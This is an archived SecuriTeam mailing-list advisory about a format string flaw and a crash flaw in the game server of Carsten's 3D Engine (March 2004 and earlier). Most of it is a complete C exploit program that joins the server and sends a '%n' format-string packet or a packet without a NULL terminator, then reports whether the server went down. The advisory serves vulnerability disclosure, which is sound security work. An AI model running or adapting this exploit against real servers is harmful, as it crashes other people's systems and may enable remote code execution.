[NT] Carsten's 3D Engine Format String and Non-Terminated Strings
From: SecuriTeam (support_at_securiteam.com)
Date: 03/10/05
- Previous message: SecuriTeam: "[NT] GFI LANguard Network Security Scanner Insecure Credential Storage"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 10 Mar 2005 17:04:01 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Carsten's 3D Engine Format String and Non-Terminated Strings
------------------------------------------------------------------------
SUMMARY
<http://www.ca3d-engine.de> Carsten's 3D Engine (Ca3de) is "a game engine
written by Carsten Fuchs".
Two security vulnerabilities have been discovered in Carsten's 3D Engine,
one allows the execution of arbitrary code by supplying format strings,
the other allows an attacker to crash the server by not supplying NULL
characters.
DETAILS
Vulnerable Systems:
* Carsten's 3D Engine March 2004 and prior
Format String
Any command received by the server leads to a format string vulnerability
that can allow an attacker to execute remote code.
Crash Caused by Non-terminated Strings:
The server is not able to handle the text strings received from the
clients and that don't contain the NULL delimiter. That causes an access
to a NULL pointer.
Exploit:
/*
by Luigi Auriemma - http://aluigi.altervista.org/poc/ca3dex.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 2048
#define PORT 30000
#define TIMEOUT 3
#define PING "\xff\xff\xff\xff" \
"\x00\x00\x00\x02" \
"\x02"
#define JOIN "\xff\xff\xff\xff" \
"\x00\x00\x00\x02" \
"\x03"
// player name
// model
#define MSGFS "\x80\x00\x00\x01" \
"\x80\x00\x00\x01" \
"\x03" \
"%n%n%n%n%n\0"
#define SEND(x,y) if(sendto(sd, x, sizeof(x) - 1, 0, (struct sockaddr
*)&peer, sizeof(peer)) \
< 0) std_err();
#define RECV if(timeout(sd) < 0) { \
fputs("\nError: socket timeout, no reply
received\n\n", stdout); \
exit(1); \
} \
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \
if(len < 0) std_err();
int create_rand_string(u_char *data, int len, u_int tmp);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
u_int seed;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ];
setbuf(stdout, NULL);
fputs("\n"
"Carsten's 3D Engine <= March 2004 format string and crash
"VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%d)]\n"
"\n"
"Attack:\n"
" 1 = command format string\n"
" 2 = crash caused by the absence of NULL delimiters\n"
"\n", argv[0], port);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
fputs("- ping server\n", stdout);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
SEND(PING, sizeof(PING) - 1);
RECV;
close(sd);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
if(atoi(argv[1]) == 2) {
fputs("- send BOOM packet (access to NULL pointer)\n", stdout);
SEND(JOIN, sizeof(JOIN) - 1);
} else {
seed = ~time(NULL);
memcpy(buff, JOIN, sizeof(JOIN) - 1);
len = sizeof(JOIN) - 1;
seed = create_rand_string(buff + len, 64, seed);
len += strlen(buff + len) + 1;
seed = create_rand_string(buff + len, 64, seed);
len += strlen(buff + len) + 1;
fputs("- join server\n", stdout);
SEND(buff, len);
RECV;
if(buff[8] == 2) {
printf("\nError: message from server: %s\n\n", buff + 8);
exit(1);
}
fputs("- send format string message\n", stdout);
SEND(MSGFS, sizeof(MSGFS) - 1);
}
close(sd);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
fputs("- check server:\n", stdout);
SEND(PING, sizeof(PING) - 1);
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
int create_rand_string(u_char *data, int len, u_int tmp) {
if(!tmp) tmp++;
len = tmp % len;
if(!len) len++;
while(len--) {
tmp = (*data + tmp) % 62;
if(tmp <= 9) {
*data = tmp + '0';
} else if((tmp >= 10) && (tmp <= 35)) {
*data = (tmp - 10) + 'A';
} else {
*data = (tmp - 36) + 'a';
}
data++;
}
*data = 0x00;
return(tmp << 1);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/ca3dex-adv.txt>
http://aluigi.altervista.org/adv/ca3dex-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] GFI LANguard Network Security Scanner Insecure Credential Storage"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
